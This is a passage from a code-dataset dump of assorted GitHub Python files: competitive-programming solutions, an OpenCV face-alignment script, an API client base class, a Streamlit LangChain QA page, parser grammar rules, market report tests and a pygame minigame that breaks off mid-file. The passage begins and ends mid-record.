Optional[str]\n","repo_name":"l3vels/L3AGI","sub_path":"apps/server/typings/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":8008,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"72"} +{"seq_id":"1609372328","text":"import sys\ninput = sys.stdin.readline\nn = int(input())\n\nlst = list(map(int,input().split()))\nlst_set = sorted(list(set(lst)))\n\ndic={}\nfor i in range(len(lst_set)):\n dic[lst_set[i]] = i\n\nfor j in lst:\n print(dic[j],end=\" \")","repo_name":"minjeoong/baekjoon_","sub_path":"18870번_좌표 압축.py","file_name":"18870번_좌표 압축.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22636666542","text":"import cv2\nimport numpy as np\n\n# ★나중에 모듈을 불러 올 때 지금처럼 파일 이름은 숫자로 시작하면 안된다.\n\nface_casacade = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')\neye_casacade = cv2.CascadeClassifier('./haarcascade_eye.xml')\n\n\n# 얼굴 이미지 데이터\nimg = cv2.imread('face.png')\n\n# 이미지 바운딩 박스\n# cascade의 경우는 그레이 스케일 이미지에서만 작동\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # 이미지 흑백처리\nfaces = face_casacade.detectMultiScale(gray, 1.1, 4) #이미지, 검색 윈도우 확대 비율(기본값은 1.1), 최소 검출횟수\n\n\nfor (x,y,w,h) in faces:\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), 3)\n\n\n# roi는 관심영역. 눈 외에 다른 곳에도 패딩이 나오는 것을 방지.\n# 관심 영역 두개 생성\nroi_color = img[y:y+h, x:x+w] \nroi_gray = gray[y:y+h, x:x+w]\n\n# 두 눈 변수 생성\neyes = eye_casacade.detectMultiScale(roi_gray, 1.1, 4)\nindex=0\n\n# for문으로 양 쪽 눈 데이터 생성\nfor (ex, ey, ew, eh) in eyes:\n if index == 0:\n eye_1 = (ex, ey, ew, eh)\n elif index ==1:\n eye_2 = (ex, ey, ew, eh)\n \n cv2.rectangle(roi_color, (ex,ey), (ex+ew, ey+eh), (0,0,255), 3)\n index = index + 1\n\n\n# 왼쪽, 오른쪽 눈 지정\nif eye_1[0] < eye_2[0]:\n left_eye = eye_1\n right_eye = eye_2\nelse:\n left_eye = eye_2\n right_eye = eye_1\n\n\n# 직사각형 중심점 좌표 계산\nleft_eye_center = (int(left_eye[0] + (left_eye[2] / 2)), int(left_eye[1] + (left_eye[3] / 2)))\nleft_eye_x = left_eye_center[0]\nleft_eye_y = left_eye_center[1]\n\nright_eye_center = (int(right_eye[0] + (right_eye[2] / 2)), int(right_eye[1] + (right_eye[3] / 2)))\nright_eye_x = right_eye_center[0]\nright_eye_y = right_eye_center[1]\n\n\n# 두 눈의 중심선 사이에 선 긋기\n# cv2.circle(roi_color, left_eye_center, 5, (255, 0, 0), -1)\n# cv2.circle(roi_color, right_eye_center, 5, (255, 0, 0), -1)\n# cv2.line(roi_color, right_eye_center, left_eye_center, (0,200,200), 3)\n# cv2.imshow('face', img)\n# cv2.waitKey(0)\n\n# 이미지 회전을 위한 수평선과 두 눈 중심점 연결하는 선 사이 각도 계산\nif left_eye_y > right_eye_y:\n A = (right_eye_x, left_eye_y)\n # -1은 시계 방향으로 회전\n # direction = -1\nelse:\n A = (left_eye_x, right_eye_y)\n # direction = 1\n\n# 두 눈 사이 점들 잇기\n\n# cv2.circle(roi_color, A, 5, (255,0,0), -1)\n\n# cv2.line(roi_color, right_eye_center, left_eye_center, (0,200,200), 3)\n# cv2.line(roi_color, left_eye_center, A, (0,200,200), 3)\n# cv2.line(roi_color, right_eye_center, A, (0,200,200), 3)\n\n# cv2.imshow('face', img)\n# cv2.waitKey(0)\n\n# 왼쪽 눈 y좌표 > 오른쪽 눈 y좌표 -> 이미지를 시계방향으로 회전 반대의 경우 반시계 방향 회전\ndelta_x = right_eye_x - left_eye_x\ndelta_y = right_eye_y - left_eye_y\nangle = np.arctan(delta_y/delta_x)\nangle = (angle * 180) / np.pi\n\n# 이미지를 세타만큼 회전\nh, w = img.shape[:2]\ncenter = (w // 2, h // 2)\n\nM = cv2.getRotationMatrix2D(center, (angle), 1.0)\nrotated = cv2.warpAffine(img, M, (w,h))\n\ncv2.imshow(\"face.png\", rotated)\ncv2.waitKey(0)\n\n\n# for (x,y,w,h) in eyes:\n# cv2.rectangle(roi_color, (x,y), (x+w,y+h), (0,255,0), 3)\n\n# '''\n# get eyes cor(좌표) -> cal degree -> make affine metrix -> image affine transform\n# '''\n\n# eyes = face_casacade.detectMultiScale(roi_gray, 1.1, 4)\n# # print(eyes)\n# index = 0\n\n# for (ex, ey, ew, eh) in eyes:\n# if index == 0:\n# eye_1 = (ex, ey, ew, eh)\n# elif index ==1:\n# eye_2 = (ex, ey, ew, eh)\n \n# cv2.rectangle(roi_color)\n\n\n# cv2.imshow('face box', face_img)\n# cv2.waitKey(0)","repo_name":"Byunggu-Son/MS_AI_School","sub_path":"이미지 다루기 및 데이터셋 구축/DAY46-22_12_07_OpenCV/3/3_2_face_eye_detect_1.py","file_name":"3_2_face_eye_detect_1.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38654936066","text":"import requests\n\nfrom client.exceptions import BadRequest\nfrom client.exceptions import Conflict\nfrom client.exceptions import Forbiden\nfrom client.exceptions import InternalServerError\nfrom client.exceptions import NotFound\nfrom client.exceptions import Unauthorized\nfrom client.logger import SrvLoggerFactory\n\n\nclass BaseAPIClass:\n\n _logger = SrvLoggerFactory().get_logger()\n\n def __init__(self, api_client):\n \"\"\"Function Summary: The base class for all apis class. It will include some common functions for api\n operations. Normally, it will be inherient by other classes.\n\n Args:\n api_client (PILOT): the client instance that initialize by password or token\n based authentication\n\n Examples:\n >>> # some login operations\n >>> api_client = PILOT(endpoint, user, pass)\n >>> BAC = BaseAPIClass(api_client)\n \"\"\"\n self.client = api_client\n self.track_flag = True\n\n def _send_request(\n self, api_endpoint, method='GET', json={}, params={}, headers={}, data={}, cookies={}, files=None, stream=False\n ):\n \"\"\"Function Summary: private function for sending the request. Since all the api will need to send with\n `Authorization` and `Refresh-token` in headers. it is a wrapper for request sending.\n\n Args:\n api_endpoint (string): the relative path for the api endpoints\n method (string): HTTP methods: GET, POST, DELETE, PUT\n json (dict): the payload for the api logics\n params (dict): the args for the api logics\n headers (dict): the extra headers for the api logic, by default, api will add\n two more attribute: `Authorization` and `Refresh-token`\n files (file stream): to update the file\n stream (stream): flag for return to handle the large reponse\n\n Examples:\n >>> # get request\n >>> self._send_request()\n \"\"\"\n\n # add the at and rt into headers if there is no provided new token in header\n if not headers.get('Authorization', None):\n headers.update({'Authorization': 'Bearer ' + self.client.token.access_token})\n headers.update({'Refresh-token': self.client.token.refresh_token})\n\n res = requests.request(\n method=method,\n url=self.client.base_url + api_endpoint,\n json=json,\n params=params,\n headers=headers,\n data=data,\n cookies=cookies,\n files=files,\n stream=stream,\n )\n\n # if we request large return eg(files) we will return it right away\n if stream:\n return res\n\n try:\n self._track_print('====== ')\n self._track_print('calling:', method, self.client.base_url + api_endpoint)\n self._track_print('request parameter:', params)\n self._track_print('request json payload:', json)\n self._track_print('request headers:', headers)\n self._track_print('request result:', res.json())\n self._track_print('====== ')\n\n # response error mapping if not 200 raise the exception\n exception_mapping = {\n 400: lambda msg: BadRequest(msg),\n 401: lambda msg: Unauthorized(msg),\n 403: lambda msg: Forbiden(msg),\n 404: lambda msg: NotFound(msg),\n 409: lambda msg: Conflict(msg),\n }\n isr = lambda msg: InternalServerError\n\n code = res.json().get('code', 200)\n if code >= 300:\n raise exception_mapping.get(code, isr)(res.json())\n\n except Exception as e:\n self._logger.error(res.__dict__)\n raise e\n\n return res\n\n def track_on(self):\n \"\"\"Function Summary: private function for flagging up the logger.\n\n Args:\n None\n\n Examples:\n >>> self._track_on()\n \"\"\"\n\n self.track_flag = True\n\n def track_off(self):\n \"\"\"Function Summary: private function for flagging down the logger.\n\n Args:\n None\n\n Examples:\n >>> self._track_off()\n \"\"\"\n\n self.track_flag = False\n\n def _track_print(self, *message):\n \"\"\"Function Summary: private function for conditional logger print.\n\n Args:\n None\n\n Examples:\n >>> self._track_print(\"message1\", varibale1)\n \"\"\"\n if self.track_flag:\n message = [str(m) for m in message]\n self._logger.info(' '.join(message))\n","repo_name":"BrainModes/sdk","sub_path":"client/api/base_class.py","file_name":"base_class.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34743934213","text":"def main():\n\tuser_input = input('Enter a string: ')\n\n\tvow = vowels_funct(user_input)\n\tcons = consonants_funct(user_input)\n\n\t# Display the result\n\n\tprint('Total vowel letters is:', vow)\n\tprint('Total consonants letters is:', cons)\n\n\ndef vowels_funct(user_input):\n\tcount_vow = 0\n\tvowels_alph = 'aeiou'\n\n\tfor ch in user_input:\n\t\tif ch in vowels_alph:\n\t\t\tcount_vow += 1\n\n\treturn count_vow\n\n\ndef consonants_funct(user_input):\n\tcount_cons = 0\n\tconsonants_alph = 'bcdfghjklmnpqrstvwxyz'\n\n\tfor ch in user_input:\n\t\tif ch in consonants_alph:\n\t\t\tcount_cons += 1\n\n\treturn count_cons\n\nmain()\n","repo_name":"legendbabs/StartingOutWithPython","sub_path":"StartOutWithPython/Chapter08/ProgrammingExercise/vowels_consonants.py","file_name":"vowels_consonants.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"8439077978","text":"from sys import stdin, setrecursionlimit\nsetrecursionlimit(10**7)\n\n\nclass Node:\n def __init__(self, data) -> None:\n self.data = data \n self.next = None\n\ndef append_last_node_first(head, n):\n if n == 0 or head is None:\n return head\n fast = head\n slow = head\n intitial_head = head\n for i in range(n):\n fast = fast.next\n while fast.next is not None:\n slow = slow.next\n fast = fast.next\n temp = slow.next\n slow.next = None\n fast.next = intitial_head\n head = temp\n return head\n \n\ndef take_input():\n head = None\n tail = None\n lst = list(map(int, stdin.readline().strip().split()))\n i = 0\n while i < len(lst) and lst[i] != -1:\n new_node = Node(lst[i])\n if head is None:\n head = new_node\n tail = new_node\n else:\n tail.next = new_node\n tail = new_node\n i += 1\n return head\n\n\ndef display_linked_list(head):\n current = head\n while current is not None:\n print(current.data, end=' ')\n current = current.next\n print()\n\n\ndef main():\n t = int(stdin.readline().strip())\n while t > 0:\n h = take_input()\n k_node = int(stdin.readline().strip())\n head = append_last_node_first(head=h, n=k_node)\n display_linked_list(head=head)\n t -= 1\n\n\nif __name__ == '__main__':\n main()\n\n# 1\n# 10 6 77 90 61 67 100 -1\n# 4","repo_name":"Sam21sop/Coding_Ninjas_2023","sub_path":"01_Career_Camp_Data_Structure_in_Python/20_Linked_List_1/AppendLastNodeToFirst.py","file_name":"AppendLastNodeToFirst.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74390164394","text":"\nimport sys, argparse, logging\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\nimport subprocess\n\nimport pygame\n\nos.environ[\"DISPLAY\"] = \":0\"\npygame.init()\n\nscreen = pygame.display.set_mode((0,0), pygame.FULLSCREEN | pygame.NOFRAME)\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nomx_command = ['omxplayer', \"-o\", \"hdmi\", \"-b\"]\n\ndef getFullPath(filename):\n return BASE_DIR + '/videos/' + filename\n\nplaylist = [getFullPath('dog.mp4'),getFullPath('dog2.mp4')]\n\n# def generatePlaylist(inpath):\n# return [f for f in listdir(inpath) if isfile(join(inpath, f))]\n# def main():\n \ndef main():\n # for f in playlist:\n # full_command = omx_command + [f]\n # stdout = subprocess.PIPE\n # proc = None\n # try:\n # # logging.debug(\"playing: {0}\".format(full_path))\n # print(f'playing: {f}')\n # proc = subprocess.run(full_command, check=True, stdin=subprocess.PIPE, stdout=stdout, close_fds=True)\n # except KeyboardInterrupt:\n # if proc is not None:\n # proc.kill()\n # # logging.info(\"Keyboard Interrupt\")\n # sys.exit()\n # except Exception as e:\n # # logging.exception()\n\n for f in playlist:\n full_command = omx_command + [f]\n sys.stdout = subprocess.PIPE \n proc = None \n try:\n proc = subprocess.run(full_command,check=True,stdin=subprocess.PIPE,stdout=sys.stdout,close_fds=True)\n except KeyboardInterrupt:\n if proc is not None:\n proc.kill() \n sys.exit()\n except Exception as e:\n print(e)\n\n\n\nrunning = True\n\nwhile running:\n main()\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE: \n running = False\n\npygame.quit()\n\n\n\n","repo_name":"binoy638/omxplayer-test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"185315919","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner # noqa\n\nfrom core.types import (\n BlueOffer,\n CategoryStatsRecord,\n Currency,\n HyperCategory,\n HyperCategoryType,\n MarketSku,\n Model,\n Offer,\n Opinion,\n RegionalModel,\n Shop,\n Tax,\n Vat,\n YamarecFeaturePartition,\n YamarecPlace,\n YamarecSettingPartition,\n)\nfrom core.matcher import Absent\nfrom core.testcase import main\nfrom simple_testcase import SimpleTestCase\nfrom core.dj import DjModel\n\n\nclass T(SimpleTestCase):\n \"\"\"\n Проверка корректности работы со стандартными параметрами для пэйджинга numdoc и page\n \"\"\"\n\n @classmethod\n def prepare(cls):\n # blue shop\n cls.index.shops += [\n Shop(\n fesh=1886710,\n datafeed_id=188671001,\n priority_region=213,\n fulfillment_virtual=True,\n virtual_shop_color=Shop.VIRTUAL_SHOP_BLUE,\n currency=Currency.RUR,\n tax_system=Tax.OSN,\n supplier_type=Shop.FIRST_PARTY,\n ),\n Shop(\n fesh=1,\n datafeed_id=1,\n priority_region=213,\n currency=Currency.RUR,\n tax_system=Tax.OSN,\n supplier_type=Shop.FIRST_PARTY,\n blue=Shop.BLUE_REAL,\n ),\n Shop(fesh=2, priority_region=213),\n ]\n model_ids = list(range(1, 6))\n cls.recommender.on_request_viewed_models(user_id=\"yandexuid:1001\").respond({\"models\": map(str, model_ids)})\n cls.recommender.on_request_models_of_interest(\n user_id=\"yandexuid:1001\", item_count=40, with_timestamps=True, version=4\n ).respond({'models': map(str, model_ids), 'timestamps': map(str, list(range(len(model_ids), 0, -1)))})\n cls.bigb.on_request(yandexuid=\"1001\", client='merch-machine').respond(counters=[])\n cls.index.models += [Model(hyperid=hyperid, hid=100 + hyperid) for hyperid in model_ids]\n cls.index.offers += [Offer(hyperid=hyperid) for hyperid in model_ids]\n cls.settings.set_default_reqid = False\n cls.dj.on_request(yandexuid='1001').respond(\n [DjModel(id='1'), DjModel(id='2'), DjModel(id='3'), DjModel(id='4')]\n )\n\n def test_products_by_history(self):\n \"\"\"\n Проверяем paging в выдаче products_by_history\n \"\"\"\n self.assertPagingSupportedForModels(\n base_query=\"place=products_by_history&yandexuid=1001&&rearr-factors=market_disable_dj_for_recent_findings%3D1\",\n ids=list(range(1, 5)),\n )\n\n @classmethod\n def prepare_also_viewed(cls):\n \"\"\"\n Конфигурация для получения нескольких моделей на выдаче also_viewed\n \"\"\"\n cls.index.yamarec_places += [\n YamarecPlace(\n name=YamarecPlace.Name.ALSO_VIEWED_PRODUCTS,\n kind=YamarecPlace.Type.SETTING,\n split_rule=YamarecPlace.SplitRule.ABT,\n partitions=[\n YamarecSettingPartition(params={'version': '1'}, splits=[{\"split\": \"also_viewed\"}]),\n ],\n ),\n ]\n cls.recommender.on_request_accessory_models(model_id=1, item_count=1000, version='1').respond(\n {'models': ['2', '3', '4', '5']}\n )\n\n def test_also_viewed(self):\n \"\"\"\n Проверяем paging в выдаче also_viewed\n \"\"\"\n self.assertPagingSupportedForModels(\n base_query=\"place=also_viewed&rearr-factors=split=also_viewed&hyperid=1\", ids=list(range(2, 6))\n )\n\n def test_also_viewed_track_last_page(self):\n \"\"\"\n Проверяем, что не отдаются офферы со страниц после последней\n \"\"\"\n response = self.report.request_json(\n 'place=also_viewed&rearr-factors=split=also_viewed&hyperid=1&numdoc=10&page=2'\n )\n self.assertFragmentIn(response, {\"results\": Absent()})\n\n @classmethod\n def prepare_personal_category_models(cls):\n \"\"\"\n Данные для непустой выдачи personalcategorymodels\n \"\"\"\n\n cls.index.models += [\n Model(hyperid=11, hid=111, model_clicks=100),\n Model(hyperid=12, hid=112, model_clicks=100),\n Model(hyperid=13, hid=113, model_clicks=100),\n Model(hyperid=14, hid=114, model_clicks=100),\n Model(hyperid=15, hid=115, model_clicks=100),\n ]\n\n cls.index.regional_models += [\n RegionalModel(hyperid=11, offers=100),\n RegionalModel(hyperid=12, offers=100),\n RegionalModel(hyperid=13, offers=100),\n RegionalModel(hyperid=14, offers=100),\n RegionalModel(hyperid=15, offers=100),\n ]\n\n cls.index.offers += [Offer(hyperid=hyperid) for hyperid in range(11, 16)]\n\n cls.index.hypertree += [\n HyperCategory(hid=111, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=112, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=113, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=114, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=115, output_type=HyperCategoryType.GURU),\n ]\n\n cls.index.yamarec_places += [\n YamarecPlace(\n name=YamarecPlace.Name.CATEGORY_GENERIC,\n kind=YamarecPlace.Type.FORMULA,\n split_rule=YamarecPlace.SplitRule.ABT,\n partitions=[\n YamarecFeaturePartition(\n feature_names=['category_id', 'position'],\n feature_keys=['category_id'],\n features=[],\n splits=[{}],\n ),\n ],\n )\n ]\n cls.recommender.on_request_models_of_interest(\n user_id=\"yandexuid:personalcategorymodels\", item_count=1000\n ).respond({\"models\": map(str, list(range(11, 16)))})\n\n def test_personal_category_models(self):\n \"\"\"\n Проверка пэйджинга для place=personalcategorymodels\n \"\"\"\n self.assertPagingSupportedForModels(\n base_query='place=personalcategorymodels&yandexuid=personalcategorymodels&rearr-factors=split=personalcategorymodels',\n ids=list(range(11, 16)),\n )\n\n @classmethod\n def prepare_popular_products(cls):\n \"\"\"\n Проверка пэйджинга для популярных товаров\n \"\"\"\n cls.index.hypertree += [\n HyperCategory(\n hid=9200,\n children=[\n HyperCategory(hid=9201, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=9202, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=9203, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=9204, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=9205, output_type=HyperCategoryType.GURU),\n ],\n ),\n ]\n\n model_ids = list(range(91, 96))\n cls.index.models += [\n Model(hyperid=91, hid=9201, model_clicks=500, opinion=Opinion(total_count=300, rating=5.0)),\n Model(hyperid=92, hid=9201, model_clicks=400, opinion=Opinion(total_count=300, rating=4.0)),\n Model(hyperid=93, hid=9201, model_clicks=300, opinion=Opinion(total_count=300, rating=3.0)),\n Model(hyperid=94, hid=9201, model_clicks=200, opinion=Opinion(total_count=300, rating=2.0)),\n Model(hyperid=95, hid=9201, model_clicks=100, opinion=Opinion(total_count=300, rating=1.0)),\n Model(hyperid=96, hid=9201, model_clicks=500, opinion=Opinion(total_count=300, rating=5.0)),\n Model(hyperid=97, hid=9201, model_clicks=400, opinion=Opinion(total_count=300, rating=4.0)),\n Model(hyperid=98, hid=9201, model_clicks=300, opinion=Opinion(total_count=300, rating=3.0)),\n Model(hyperid=99, hid=9201, model_clicks=200, opinion=Opinion(total_count=300, rating=2.0)),\n Model(hyperid=100, hid=9201, model_clicks=100, opinion=Opinion(total_count=300, rating=1.0)),\n ]\n\n cls.index.offers += [Offer(hyperid=hyperid, fesh=2) for hyperid in model_ids]\n feed_ids = [1] * 5\n prices = [5, 50, 45, 36, 15]\n sku_offers = [BlueOffer(price=price, vat=Vat.VAT_10, feedid=feedid) for feedid, price in zip(feed_ids, prices)]\n\n # market skus\n cls.index.mskus += [\n MarketSku(hyperid=hyperid, sku=hyperid * 1000 + 1, blue_offers=[sku_offer])\n for hyperid, sku_offer in zip(model_ids, sku_offers)\n ]\n\n cls.index.blue_category_region_stat += [\n CategoryStatsRecord(hid=9201, region=213, n_offers=3, n_discounts=3),\n ]\n cls.bigb.on_request(yandexuid=\"1009\", client='merch-machine').respond(counters=[])\n\n cls.recommender.on_request_models_of_interest(user_id='yandexuid:1009').respond(\n {'models': map(str, list(range(96, 101))), 'timestamps': map(str, model_ids)}\n )\n cls.recommender.on_request_models_of_interest(\n user_id='yandexuid:1009', item_count=40, with_timestamps=True\n ).respond({'models': map(str, list(range(96, 101))), 'timestamps': map(str, model_ids)})\n\n def test_popular_products(self):\n \"\"\"\n Проверка пэйджинга для popular_products\n \"\"\"\n self.assertPagingSupportedForModels(\n base_query='place=popular_products&rids=213&hid=9200&yandexuid=1009&rgb=green&rearr-factors=switch_popular_products_to_dj_no_nid_check=0',\n ids=[91, 92, 93, 94, 95],\n )\n\n def test_popular_products_blue(self):\n \"\"\"\n Проверка пэйджинга для popular_products&rgb=blue\n \"\"\"\n self.assertPagingSupportedForModels(\n base_query='place=popular_products&rids=213&hid=9200&yandexuid=1009&rgb=blue&rearr-factors=switch_popular_products_to_dj_no_nid_check=0',\n ids=[91, 92, 93, 94, 95],\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_paging (2).py","file_name":"test_paging (2).py","file_ext":"py","file_size_in_byte":10363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20609318639","text":"__import__(\"pysqlite3\")\nimport sys\n\nsys.modules[\"sqlite3\"] = sys.modules.pop(\"pysqlite3\")\n\nimport streamlit as st\nfrom langchain.document_loaders import GCSDirectoryLoader\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.embeddings import VertexAIEmbeddings\nfrom langchain.vectorstores import Chroma\nfrom langchain.chains import RetrievalQA\nfrom langchain.llms import VertexAI\nfrom langchain.chat_models import ChatVertexAI\n\nllm = ChatVertexAI()\n\n\n# def createLoader(bucket):\n# loader = GCSDirectoryLoader(project_name=\"blaa-bi-in-a-box\", bucket=bucket)\n# data = loader.load()\n# return data\n\n\n# def createSplits(data):\n# text_splitter = RecursiveCharacterTextSplitter(chunk_size=500, chunk_overlap=0)\n# all_splits = text_splitter.split_documents(data)\n# return all_splits\n\n\n# def createVectorstore(all_splits):\n# embeddings = VertexAIEmbeddings()\n# vectorstore = Chroma.from_documents(documents=all_splits, embedding=embeddings)\n# retriever = vectorstore.as_retriever()\n# return retriever\n\n\ndef source_button(url: str, text: str = None, color=\"#FD504D\"):\n st.markdown(\n f\"\"\"\n \n
\n {text}\n
\n
\n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef createVectorStore(bucket):\n loader = GCSDirectoryLoader(project_name=\"blaa-bi-in-a-box\", bucket=bucket)\n data = loader.load()\n text_splitter = RecursiveCharacterTextSplitter(chunk_size=500, chunk_overlap=0)\n all_splits = text_splitter.split_documents(data)\n embeddings = VertexAIEmbeddings()\n vectorstore = Chroma.from_documents(documents=all_splits, embedding=embeddings)\n return vectorstore.as_retriever(\n search_type=\"similarity\", search_kwargs={\"k\": 3}, max_tokens_limit=256\n )\n\n\ndef answerQuestion(input, retriever):\n qa_chain = RetrievalQA.from_chain_type(\n llm,\n chain_type=\"map_reduce\",\n retriever=retriever,\n return_source_documents=True,\n )\n return qa_chain({\"query\": input})\n\n\nst.title(\"LangChain 🦜🔗\")\n\nif \"success_flag\" not in st.session_state:\n st.session_state.success_flag = False\n\nif \"vector_store\" not in st.session_state:\n st.session_state.vector_store = []\n\nuser_input = st.sidebar.text_input(\n \"Specify the GCS bucket containing your documents here:\"\n)\n\n\nif user_input and not st.session_state.success_flag:\n if st.sidebar.button(\"Initialize Vectorstore\"):\n with st.spinner(\"Initializing...please wait\"):\n result = createVectorStore(user_input)\n st.session_state.vector_store = result\n st.sidebar.success(\"Vectorstore successfully initialized!\")\n st.session_state.success_flag = True\n\nif st.session_state.success_flag:\n st.sidebar.success(\"Vectorstore successfully initialized!\")\n question = st.text_input(\"What would you like to know?\")\n if st.button(\"Submit question\"):\n answer = answerQuestion(question, st.session_state.vector_store)\n st.markdown(answer[\"result\"])\n no_of_result = 0\n for d in answer[\"source_documents\"]:\n no_of_result += 1\n st.header(f\"Chunk number {no_of_result}\")\n st.markdown(d.page_content)\n # st.markdown(d.metadata.get(\"source\"))\n source = d.metadata.get(\"source\")\n source_button(source, \"click to get directed to the source document\")\n st.divider()\n # st.markdown(answer)","repo_name":"marcjwo/streamlit-poc","sub_path":"pages/02_langchain_qa.py","file_name":"02_langchain_qa.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"113003334","text":"#! coding=UTF-8\n\nfrom tbparser.grammar import Rule, tokenNode as tnode, sequence, zeroToOne, zeroToMany\nfrom tbparser.parser import AstNode\nfrom gobjcreator2.input.grammar.tokens import ID, NAMESPACE_SEP, NAMESPACE_ROOT_SEP, \\\nUNSIGNED, INTEGER, LONG, NULL, BOOLEAN, BYTE, STRING, FLOAT, DOUBLE, POINTER\n\nclass TypeName(Rule):\n \n def __init__(self, ident=''):\n \n Rule.__init__(self, 'typeName', ident)\n \n def expand(self, start, end, context):\n \n start.connect(TypePath('user-defined')).connect(end)\n start.connect(zeroToOne(tnode(UNSIGNED, 'unsigned'))).connect(tnode(INTEGER,'integer')).connect(end)\n start.connect(zeroToOne(tnode(UNSIGNED, 'unsigned'))).connect(tnode(LONG,'long')).connect(end)\n start.connect(tnode(NULL, 'null')).connect(end)\n start.connect(tnode(BOOLEAN, 'boolean')).connect(end)\n start.connect(tnode(BYTE, 'byte')).connect(end)\n start.connect(tnode(STRING, 'string')).connect(end)\n start.connect(tnode(FLOAT, 'float')).connect(end)\n start.connect(tnode(DOUBLE, 'double')).connect(end)\n start.connect(tnode(POINTER, 'pointer')).connect(end)\n \n def transform(self, astNode):\n \n identifiers = {'user-defined': lambda node: node.getText(),\n 'integer': lambda node: self._get_int_or_long(node, astNode),\n 'long': lambda node: self._get_int_or_long(node, astNode),\n 'null': lambda node: node.getText(),\n 'boolean': lambda node: node.getText(),\n 'byte': lambda node: node.getText(),\n 'string': lambda node: node.getText(),\n 'float': lambda node: node.getText(),\n 'double': lambda node: node.getText(),\n 'pointer': lambda node: node.getText()\n }\n \n typeName = ''\n for ident in identifiers: \n node = astNode.getChildById(ident)\n if node:\n typeName = identifiers[ident](node)\n break\n \n return AstNode(self.getName(), typeName)\n \n def _get_int_or_long(self, node, parent):\n \n unsignedNode = parent.getChildById('unsigned')\n if not unsignedNode:\n return node.getText()\n else:\n return 'unsigned %s' % node.getText()\n \nclass TypePath(Rule):\n \n def __init__(self, ident=''):\n \n Rule.__init__(self, 'typePath', ident)\n \n def expand(self, start, end, context):\n \n seq = sequence(tnode(ID), tnode(NAMESPACE_SEP))\n \n start\\\n .connect(zeroToOne(tnode(NAMESPACE_ROOT_SEP)))\\\n .connect(zeroToMany(seq))\\\n .connect(tnode(ID))\\\n .connect(end)\n \n def transform(self, astNode):\n \n typePath = \"\"\n for child in astNode.getChildren():\n typePath += child.getText()\n \n return AstNode(self.getName(), typePath)","repo_name":"ThomasBollmeier/GObjectCreator2","sub_path":"src/gobjcreator2/input/grammar/type_name.py","file_name":"type_name.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20557891131","text":"import logging\nimport os\nimport time\n\n\ndef initialise_logger(output_log_path):\n try:\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n log_folder = output_log_path\n os.makedirs(log_folder, exist_ok=True)\n log_file = os.path.join(log_folder, \"eks_monitoring.log\")\n logging.basicConfig(\n filename=log_file,\n filemode=\"w\",\n level=logging.DEBUG,\n format=\"%(asctime)s,%(levelname)-8s [%(filename)s:%(lineno)d] %(message)s\",\n datefmt=\"%Y-%m-%d:%H:%M:%S\",\n )\n logger.info(\"created at \" + str(time.ctime()))\n return logger\n except Exception as ex:\n print(ex)\n print(\"Failed to create log file: might be due to invalid path\")\n exit(1)\n","repo_name":"abhishekpatare/eks_monitoring_v2","sub_path":"logging_config.py","file_name":"logging_config.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6237393674","text":"import sys\nfrom functools import partial\nfrom patchworkorange.core.minigamemanager import Minigame\nfrom logging import getLogger\nimport pygame\nimport random\nfrom pygame import USEREVENT as TIMER_ID\nfrom pygame.sprite import Group, Sprite\nfrom patchworkorange.core import resources\nimport os\n\nfrom animation import Animation\n\nlogger = getLogger(__name__)\n\nWINDOW_SIZE = (1280, 720)\n\n\nclass Xbill(Minigame):\n GAME_NAME = \"Xbill\"\n\n UPDATE_FREQUENCY = 300\n FRAME_DELAY = 1000.0 / 60.0\n\n GAME_DURATION = 60*1000\n\n BILL_SPAWN_INTERVAL = 2 * 1000\n\n def __init__(self, **kwargs):\n self.background = None\n self.screen = None\n self.clock = None\n self.font = None\n self.terminals = []\n self.bills = []\n self.floating_texts = []\n self.countdown = 0\n\n def initialize(self, context):\n self.screen = 